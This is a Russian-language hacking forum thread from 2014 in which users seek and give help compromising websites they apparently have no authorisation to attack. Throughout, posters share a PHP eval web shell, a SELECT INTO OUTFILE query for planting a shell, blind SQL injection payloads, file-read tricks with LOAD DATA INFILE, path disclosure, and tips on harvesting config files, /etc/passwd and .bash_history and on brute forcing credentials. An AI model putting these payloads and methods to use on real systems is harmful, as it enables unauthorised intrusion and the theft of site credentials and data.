Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    по моему вариант что в том файле будет пароль рута 1 на милион

    иногда тут 'etc/passwd' бывают пароли открытые
     
    #23701 mazaxaka, 21 Dec 2014
    Last edited: 21 Dec 2014
  2. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    в файле etc/my.conf нет паролей от мускуля. пароли от пользователей мускуля хранятся обыно в таблицах и в зашифрованом виде. таблицы хранятся в файлах. которые хранятся в каталоге. каталог можно посмотреть в файле etc/my.conf переменная datadir

    Советую искать пароли от юзеров мускуля в скриптах и конфигах. 100% что там они будут в открытом виде.

    в /etc/passwd уже не один дистр по дефолту уже пароли не хранит
     
  3. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    /etc/my.conf не читает

    /etc/mysql/my.cnf показал datadir:

    /var/lib/mysql

    Как дальше быть? Ну все что я нашел в скриптах и фалах, это логин и пароль не от рута, с него я и делаю эти запросы. Есть еще ISP Manager. Может от него как-то можно найти пароли или он как-то сможет помочь? Нужно любым способом залить шелл.
    Phpinfo тоже есть.

    Может каким-то образом можно получить структуру файлов и папок?
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    структуру только брутфорсом и раскрытием путей. если есть phpinfo, стоит посмотреть L/RFI. стоит просканить порты и директории, посмотреть, что на них. узнайте, что за хостер, попробуйте выяснить местоположение phpmyadmin. загляните в .bash_history и другие интересные файлы, нередко там встречается интересная информация. пробовали пароль от mysql для ssh, ftp? посмотрите passwd и пользователей оттуда, брутфорс никто не отменял. просканируйте поддмены, dnsenum, pyknock, AXFR.
    одной SQLi хек не ограничивается.
     
    _________________________
  5. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    есть сайт, заливаю шел а он сразу трется, пробовал разные штук 5 все трет.
    заливаю
    Code:
    eval($_REQUEST[e]);
    вывожу пхпинфо, но там нету путей, только до пхп и мускула, а на папку домена нету.
    как через евал можно прочитать файл конфиг например, или раскрыть пути

    Code:
    $page = $_GET['page'];
    include($page.'.php');
    тоже пробовал. не работает.

    в общем могу залить любой пхп кроме шелов(( подскажите что можно сделать в данном случае
     
  6. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    через системные команды посмотреть?
     
  7. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Покажет текущию папку где выполняется скрипт:
    PHP:
    echo dirname(__FILE__);
    если вывод ошибок не отключен, то как вариант можно использовать баги в функциях:
    PHP:
    echo htmlspecialchars($_REQUEST[e]);
    вызываем так: ?e[]=123 будет раскрытие путей.

    Чтобы прочитать файл конфига, можно сделать так:
    PHP:
    echo file_get_contents('config.php');
    это всего лишь банальные команды, а если системные будут включены там вообще все намного проще и очень странно, что вам phpinfo(), очень мало инфы выдало...

    По поводу заливки, наверное просто какой то мод секьюрити не дает им залиться, а скорее заливаются но права автоматически на выполнение закрываются, попробуйте какой нить обычный файловый менеджер залить или упрощенный шелл, также можно попробовать поменять расширение шелла.
     
    _________________________
    1 person likes this.
  8. T1B3R

    T1B3R Member

    Joined:
    22 Sep 2010
    Messages:
    230
    Likes Received:
    20
    Reputations:
    1
    вопрос по файлу wp-config.php
    есть доступ к файлу конфигурации вп. Как можно получить доступ к сайту?
    В файле есть логин и пароль для базы данных, но как зайти в базу данных?
     
  9. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    158
    Likes Received:
    37
    Reputations:
    2
    Никак
     
  10. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    С чего ты взял? Есть шанс, что СУБД находится рядом с сайтом.
    А вообще пароль может быть таким же как и от админки, этот факт тоже нужно учитывать.
     
  11. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    158
    Likes Received:
    37
    Reputations:
    2
    Ничтожный же шанс.
    Вопрос про бд вроде был
     
  12. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    Code:
    ...php?ID=12234+AND+1=1
    -> истинный вывод
    Code:
    ...php?ID=12234+AND+1=2
    -> неверный вывод

    В общем, boolean based, mysql. Как раскручивать? Обычно я sqlmap'ом слепые раскручиваю, но тут типа [CRITICAL] unable to retrieve the database names
     
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    «Никак» это означает, что шансов нет. Да и смотреть нужно на конкретную ситуацию, о которой вы даже не знаете. Не стоит вводить в заблуждение.
    Ответ: да, можно. Ищите на портах, в папках, поддоменах.
     
    _________________________
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    and(subsrt((select table_name from information_schema.tables limit 1,1),1,1))='c'
     
    _________________________
  15. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    еще такой вопрос возник, есть бд file-priv n
    цмс вордпрес.добовляю нового админа. гружу через плагины.или не грузится или отображает код шелла, вп 3.6-4.0 есть варианты загрузить или проинклудить както?

    П.с плагины редактировать не могу и тему изменять тоже, везде пишет

    Code:
    Чтобы сохранить изменения, нужно сделать этот файл доступным для записи. Дополнительную информацию можно получить в Кодексе.
    
     
  16. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    не знаю почему но пхпинфо вообще подчти нефига не показывает.
    спасибо, через
    Code:
    echo dirname(__FILE__);
    путь нашел

    Code:
    echo file_get_contents('config.php');
    не читает конфиг. перепробовал уйму вариантов.
    файл менеджер пишет 404, упрощеные шеллы не выполняются показывает исходный код,хотя файлы пхп с хело ворлд льются и запускаются как нужно...




    да бы не плодить кучу сообщений

    Code:
    LOAD DATA LOCAL INFILE '/home/h41954/data/www/' INTO TABLE test FIELDS TERMINATED BY '\n'
    я так понял LOAD DATA LOCAL INFILE работает на myslq до 5 ветки только?
     
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    нет, работает с 3 ветки. (с 3.22.6)
    пхпхинфо в студию.
     
    _________________________
  18. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Вообщем случайно наткнулся на скуль, и решил попробовать крутануть ее. (havij'em))
    Не буду ходить вокруг до около. Опишу сразу все что пробовал и что не получается.
    Вообщем мускул работает от рута, на пользователя Root в мускуле даже пасса нет)
    Читаются все файлы на сервере, причем не только файлы но и например в хавиже запрос на чтение по такому пути /usr/home/www/htdocs/
    Вижу какие папки и файлы находятся в каталоге htdocs
    Вообщем все папки и файлы читаются на сервере.
    На самом сайте есть админка и она защищена .htpasswd
    Читаю .htpasswd выдираю логин пасс, воожу , не пускает.
    На сервере так же есть еще пару сайтов и везде в админку .htpasswd, но не пускает никуда(читал где то что в htaccess путь не правельно указан к htpasswd) вообще забил на такой способ попасть в админку.
    Так же на сервере есть phpmyadmin, доступ к нему идет через htaccess
    в файле .htaccess
    Code:
    <IfModule mod_auth.c>
      AuthName authorization
      AuthType Basic
      <IfModule mod_auth_pwcheck.c>
        AuthPwcheckActive On
        AuthPwcheckAuthoritative On
        require group rusers
        satisfy any
      </IfModule>
    </IfModule>
    
    Order deny,allow
    Deny from all
    
    <IfModule mod_charset.c>
      CharsetDisable On
    </IfModule>
    Собственно вариант попасть в phpmyadmin я тоже исключил.

    Решил попробовать через функцию Query в хавиже залить мини шелл таким образом
    Code:
    SELECT '<?php eval($_REQUEST[cmd]);?>' into outfile '/tmp/123.php'
    хавиж ошибку не выдал но и ничего вообще не произошло после запроса.
    Сообственно файл тоже не создался в tmp
    а да, забыл сообщить что FILE_PRIV = Y
    Ребят, очень нужно залится на сайт этот) очень жирный и полезный сайт. Прошу помощи.
    А еще попрошу не пинать за хавиж!)
     
    #23718 GroM88, 27 Dec 2014
    Last edited: 27 Dec 2014
  19. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    странно. на 2х mysql 5.** ветки пишет что не поддерживается версией
     
  20. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    попробуй в диру сайта лить, найти папку для записи, руками а не через хавиж, возможно глюк в нём!
    Кстати, возможно ковычки ' вызывают ошибку, но хавиж может тебе и не показать, будешь руками запросы посылась сам увидешь в чём проблема!
     
    #23720 DezMond™, 27 Dec 2014
    Last edited: 27 Dec 2014
    1 person likes this.
Thread Status:
Not open for further replies.